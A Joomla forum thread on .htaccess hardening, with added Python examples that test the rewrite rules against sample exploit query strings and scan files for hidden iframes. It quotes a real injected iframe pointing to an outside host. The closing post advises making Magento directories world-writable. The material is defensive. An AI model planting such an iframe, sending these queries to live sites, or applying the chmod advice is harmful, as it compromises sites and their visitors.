2. Does my existing one do the job or should I copy in those which are missing?
As you see mine is more extensive. I should go for your last option. The only big difference I see is this rule:
Code:
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]
Quite interesting, where did you find this one?
Quote
3. How does one test such a file to know it works or is it just blind faith?
It should work out of the box. If you get errors, just comment the new stuff and test it by uncommenting rule by rule.

Please let me know if something goes wrong, I am glad to help you out.
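Locutus suggests commenting the new rules back in one at a time; a quicker offline check, added here and not part of the thread, is to transcribe the query-string and request-method conditions from the 1.0.x file in the first post into Python and run constructed sample requests through them. It reproduces mod_rewrite's [OR] grouping and "!" negation, with the external-script exception line uncommented and example.com standing in for the site's own domain (an assumption, as the file's comment asks the reader to substitute their domain).

```python
"""Offline check of the request-filtering rules from the Joomla 1.0.x .htaccess in the first post.

Added example, not code from the thread. The RewriteCond chains are transcribed as Python
regexes; the sample requests below are constructed for the check, not captured traffic.
"""
import re


def cond(pattern, nc=False, negate=False, or_next=False):
    """One RewriteCond line: pattern, [NC] flag, leading '!' and trailing [OR] flag."""
    return re.compile(pattern, re.I if nc else 0), negate, or_next


# "Block out some common exploits" chain, with the [ and ] conditions enabled as in the 1.0.x file
EXPLOIT_CHAIN = [
    cond(r"\[", or_next=True),
    cond(r"\]", or_next=True),
    cond(r"mosConfig_[a-zA-Z_]{1,21}(=|\%3D)", or_next=True),
    cond(r"base64_encode.*\(.*\)", or_next=True),
    cond(r"(\<|%3C).*script.*(\>|%3E)", nc=True, or_next=True),
    cond(r"GLOBALS(=|\[|\%[0-9A-Z]{0,2})", or_next=True),
    cond(r"_REQUEST(=|\[|\%[0-9A-Z]{0,2})"),
]

# "Block out referrers to external scripts" chain with the exception line uncommented;
# example.com stands in for the site's own domain (assumption, as the file's comment asks)
EXTERNAL_CHAIN = [
    cond(r"(https?|ftp)(\:|\%3A)", nc=True),
    cond(r"return=http\%3A\%2F\%2Fwww\.example\.com(\%2F)?&?", nc=True, negate=True),
]

# RewriteRule patterns are matched against the path relative to the .htaccess directory
RULES = [
    ("common exploits", re.compile(r"^(.*)$"), EXPLOIT_CHAIN),
    ("external script in query", re.compile(r"\.php[45]?$"), EXTERNAL_CHAIN),
]

METHOD_RE = re.compile(r"^(TRACE|TRACK|OPTIONS|DELETE)")


def chain_matches(chain, query):
    """Evaluate a RewriteCond chain like mod_rewrite: consecutive conditions carrying [OR]
    form a group that needs one hit, and the groups are AND-ed together."""
    group_hit = False
    for regex, negate, or_next in chain:
        hit = bool(regex.search(query)) != negate
        group_hit = group_hit or hit
        if not or_next:
            if not group_hit:
                return False
            group_hit = False
    return True


def classify(method, path, query):
    """Name the first rule that would answer 403, or None if the request passes.
    `query` is the raw, still percent-encoded string, which is what %{QUERY_STRING} holds."""
    if METHOD_RE.search(method):
        return "request method"
    for name, path_re, chain in RULES:
        if path_re.search(path) and chain_matches(chain, query):
            return name
    return None


# Constructed sample requests: (method, path, raw query, expected verdict)
SAMPLES = [
    ("GET", "index.php", "option=com_content&task=view&id=12", None),
    # return URL pointing at the site's own domain: the exception condition lets it through
    ("GET", "index.php", "option=com_user&return=http%3A%2F%2Fwww.example.com%2F", None),
    # the same component call with a foreign return URL is refused
    ("GET", "index.php", "option=com_user&return=http%3A%2F%2Fwww.example.net%2F", "external script in query"),
    ("GET", "index.php", "mosConfig_some_setting=1", "common exploits"),
    ("GET", "index.php", "searchword=%3Cscript%3Etest%3C%2Fscript%3E", "common exploits"),
    # encoded brackets are caught by the GLOBALS condition, which allows for a %XX after the name
    ("GET", "index.php", "GLOBALS%5Bx%5D=1", "common exploits"),
    ("TRACE", "index.php", "", "request method"),
    # the external-script rule only covers .php paths, so a static file is outside its scope
    ("GET", "images/logo.png", "return=http%3A%2F%2Fwww.example.net", None),
]


def check_samples():
    """Run every sample and return (method, path, query, expected, actual) tuples."""
    return [(m, p, q, want, classify(m, p, q)) for m, p, q, want in SAMPLES]


if __name__ == "__main__":
    for m, p, q, want, got in check_samples():
        mark = "ok " if got == want else "BAD"
        print(f"{mark} {m:6} /{p}?{q} -> {got}")
```

Any line printed as BAD after editing a pattern means the rule no longer does what the comment in the file claims, which is the signal to look at before uploading the .htaccess.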
exlemor
Re: Tip: Hardening your Joomla site by .htaccess Version 2.1
« Reply #3 on: May 23, 2009, 02:23:12 PM »

Hi there,

Thank you so much for this updated .htaccess file.

I'm no expert at all with RegEx expressions, and I was wondering if you could clue me in on how to add this site to the list of bad sites/bots:

One of my customers' sites was hacked, and they added <iframe> statements in some of the following files: index.html, index.php and default.php, with this in them:

Code:
<iframe src="http://bigtopmanagement.cn:8080/ts/in.cgi?pepsi12" width=2 height=4 style="visibility: hidden"></iframe>

I should add that this is for a Joomla v1.5.10 site.

Thanks in advance for the help.
Sincerely,

Emmanuel.

P.S.: Is it possible to have some sort of .htaccess file which pulls another file from a trusted source on the internet (such as your site) with an updated list of these nasty sites, so that we get an ever-growing list of sites to avoid? If that is possible, and the file in question got large-ish, would that affect the performance of the site enough to be noticeable?
locutus
Re: Tip: Hardening your Joomla site by .htaccess Version 2.1
« Reply #4 on: May 25, 2009, 02:51:43 PM »

Hi,

Blocking the sites the iframe refers to doesn't work; you are already hacked by then. You should remove all of the pages of your website and upload a fresh copy of Joomla. Then install my script.
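The reinstall advice above is sound, but before wiping the site you want to know which files were touched, because a hidden iframe in index.php may well come with a modified file or a dropped backdoor elsewhere. This is an added example, not code from the original thread: a Python scanner that walks a web root and reports iframes that are hidden by CSS or sized a few pixels, the two tells of the injection Emmanuel posted. The files it scans are constructed in a temporary directory for the demo (the injected line is modelled on the posted iframe; the hostname is only used as a string, nothing is fetched); on a real tree call `scan_tree("/path/to/joomla")`.

```python
import os
import re
import tempfile

# Constructed sample files standing in for a compromised Joomla web root.
# Two carry an injected iframe, one carries a legitimate visible iframe.
SAMPLE_FILES = {
    "index.php": (
        "<?php\n// Joomla entry point\ndefine('_JEXEC', 1);\n?>\n"
        "<iframe src=\"http://bigtopmanagement.cn:8080/ts/in.cgi?pepsi12\" "
        "width=2 height=4 style=\"visibility: hidden\"></iframe>\n"
    ),
    "templates/default.php": (
        "<html><body>\n<iframe src='http://example.invalid/x' "
        "width=1 height=1 style='display:none'></iframe>\n</body></html>\n"
    ),
    "templates/clean.html": (
        "<html><body><iframe src=\"/media/player.html\" "
        "width=640 height=480></iframe></body></html>\n"
    ),
    "configuration.php": "<?php class JConfig { var $offline = '0'; }\n",
}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE | re.DOTALL)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
SIZE_RE = re.compile(r"\b(width|height)\s*=\s*['\"]?(\d+)", re.IGNORECASE)
SCAN_EXT = (".php", ".html", ".htm", ".js")


def is_suspicious_iframe(tag):
    """An iframe nobody is meant to see: hidden via CSS, or 10px or less in
    either dimension (the posted injection is 2x4 and visibility: hidden)."""
    if HIDDEN_RE.search(tag):
        return True
    sizes = {name.lower(): int(px) for name, px in SIZE_RE.findall(tag)}
    return bool(sizes) and min(sizes.values()) <= 10


def scan_tree(root):
    """Walk a web root and return [(relative_path, offending_tag), ...]."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for tag in IFRAME_RE.findall(text):
                if is_suspicious_iframe(tag):
                    hits.append((os.path.relpath(path, root), tag))
    return hits


def write_samples(root):
    """Materialise the constructed sample tree under root."""
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Build the sample tree in a temp dir, scan it, and return the hits."""
    with tempfile.TemporaryDirectory() as root:
        write_samples(root)
        return scan_tree(root)


if __name__ == "__main__":
    for path, tag in demo():
        print(f"{path}: {tag}")
```

Treat every hit as a reason to diff the file against a known-good copy of the same Joomla version, and extend SCAN_EXT or the regexes if the injection you are chasing uses a different tag (script or object injections are just as common as iframes).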
locutus
Re: Tip: Hardening your Joomla site by .htaccess Version 2.3
« Reply #5 on: September 10, 2009, 10:08:43 PM »

Version 2.3 is out!

Check the first post for more information.
locutus
Re: Tip: Hardening your Joomla site by .htaccess Version 2.4
« Reply #6 on: October 19, 2009, 12:44:26 AM »

Update your htaccess to version 2.4!!!
locutus
Re: Tip: Hardening your Joomla site by .htaccess Version 2.4 and 2.5
« Reply #7 on: November 18, 2009, 03:44:53 AM »

Version 2.5 is out for Joomla 1.5.x. I recommend all users to upgrade!
locutus
Re: Tip: Hardening your Joomla site by .htaccess Version 2.4 and 2.6
« Reply #8 on: November 24, 2009, 03:33:20 AM »

Version 2.6 is out for Joomla 1.5.x.

Fixed a small bug for the joomla 1.5.x administration.
« Last Edit: November 24, 2009, 05:20:35 AM by locutus »
Neeraj123
Re: Tip: Hardening your Joomla site by .htaccess Version 2.4 and 2.6
« Reply #9 on: February 11, 2010, 02:46:40 PM »

Hi

If you have access to SSH, you can use the following commands to change permissions prior to installing (and after extracting the files)

cd magento
chmod o+w var var/.htaccess app/etc
chmod -R o+w media


« Last Edit: August 01, 2010, 12:38:55 PM by Neeraj123 »